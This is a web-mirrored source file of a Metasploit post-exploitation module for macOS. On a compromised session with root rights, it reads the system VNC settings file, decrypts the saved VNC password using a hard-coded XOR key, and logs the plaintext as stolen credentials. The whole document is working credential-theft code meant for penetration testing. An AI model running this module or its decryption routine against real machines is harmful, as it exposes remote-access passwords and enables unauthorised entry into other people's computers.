CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/osx/gather/vnc_password_osx.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::OSX::Priv

8
  include Msf::Post::File

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'OS X Display Apple VNC Password',

15
        'Description' => %q{

16
          This module shows Apple VNC Password from Mac OS X High Sierra.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => [ 'Kevin Gonzalvo <interhack[at]gmail.com>'],

20
        'Platform' => [ 'osx' ],

21
        'SessionTypes' => [ 'meterpreter', 'shell' ]

22
      )

23
    )

24
  end

25


26
  def decrypt_hash(hash)

27
    if hash.nil? || hash.empty?

28
      return nil

29
    end

30


31
    aux = ['1734516E8BA8C5E2FF1C39567390ADCA'].pack('H*')

32
    fixedkey = aux.unpack('C*')

33


34
    str_pw = [hash.to_s].pack('H*')

35
    array_pwd = str_pw.unpack('C*')

36
    str = ''

37


38
    for data in fixedkey

39
      str += (data ^ array_pwd.shift).chr

40
    end

41
    return str.delete("\0")

42
  end

43


44
  def run

45
    unless is_root?

46
      fail_with(Failure::NoAccess, 'Root privileges are required to read VNC password file')

47
    end

48
    print_status('Checking VNC Password...')

49
    vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt'

50
    passwd_encrypt = read_file(vncsettings_path.to_s)

51
    final_passwd = decrypt_hash(passwd_encrypt.to_s)

52
    if !final_passwd.nil?

53
      print_good("Password Found: #{final_passwd}")

54
      pass_file = store_loot('osx.vnc.password', 'text/plain', session, final_passwd, 'passwd.pwd', 'OSX VNC Password')

55
      print_good("Password data stored as loot in: #{pass_file}")

56
      credential_data = {

57
        origin_type: :session,

58
        session_id: session_db_id,

59
        post_reference_name: fullname,

60
        private_type: :password,

61
        private_data: final_passwd.to_s,

62
        workspace_id: myworkspace_id

63
      }

64
      create_credential(credential_data)

65
    else

66
      print_error('Password not found')

67
    end

68
  end

69
end

70


71